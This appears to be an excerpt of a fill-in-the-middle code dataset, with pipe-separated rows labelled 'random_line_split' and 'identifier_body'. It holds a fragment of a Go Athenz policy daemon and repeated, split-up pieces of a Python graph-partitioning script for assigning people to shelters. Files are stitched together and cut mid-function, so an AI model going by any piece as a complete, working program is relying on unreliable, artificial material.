if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
} | etagFlushDur time.Duration
etagExpTime time.Duration
| random_line_split |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
|
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G | identifier_body |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models | fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
